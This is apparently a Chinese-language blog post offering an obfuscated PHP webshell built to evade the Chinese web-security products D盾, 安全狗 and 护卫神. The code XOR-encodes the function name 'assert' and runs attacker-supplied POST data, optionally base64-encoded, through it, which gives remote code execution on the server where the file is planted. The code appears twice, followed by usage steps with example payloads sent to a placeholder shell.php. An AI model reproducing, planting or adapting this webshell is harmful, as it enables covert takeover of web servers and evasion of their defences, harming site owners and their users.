+免杀PHP一句话一枚

发表于 2019年08月19日
webshell , 免杀

免杀PHP一句话shell，利用随机异或免杀D盾，免杀安全狗护卫神等

<?php
class VONE {
	function HALB() {
		$rlf = 'B' ^ "\x23";
		$fzq = 'D' ^ "\x37";
		$fgu = 'h' ^ "\x1b";
		$sbe = 'R' ^ "\x37";
		$gba = 'H' ^ "\x3a";
		$oya = 'Y' ^ "\x2d";
		$MWUC = $rlf . $fzq . $fgu . $sbe . $gba . $oya;
		return $MWUC;}function __destruct() {
		$RNUJ = $this->HALB();
		@$RNUJ($this->HY);}}
$vone = new VONE();
@$vone->HY = isset($_GET['id']) ? base64_decode($_POST['mr6']) : $_POST['mr6'];
?>

<?php

class VONE {

function HALB() {

$rlf = 'B' ^ "\x23";

$fzq = 'D' ^ "\x37";

$fgu = 'h' ^ "\x1b";

$sbe = 'R' ^ "\x37";

$gba = 'H' ^ "\x3a";

$oya = 'Y' ^ "\x2d";

$MWUC = $rlf . $fzq . $fgu . $sbe . $gba . $oya;

return $MWUC;}function __destruct() {

$RNUJ = $this->HALB();

@$RNUJ($this->HY);}}

$vone = new VONE();

@$vone->HY = isset($_GET['id']) ? base64_decode($_POST['mr6']) : $_POST['mr6'];

使用说明

是否传入id参数决定是否把流量编码

http://www.xxx.com/shell.php  
POST: mr6=phpinfo();  //与普通shell相同

http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)

POST: mr6=cGhwaW5mbygpOwo=  //payload的base64编码

http://www.xxx.com/shell.php

POST: mr6=phpinfo(); //与普通shell相同

http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)

POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码

来自于https://github.com/yzddmr6/webshell-venom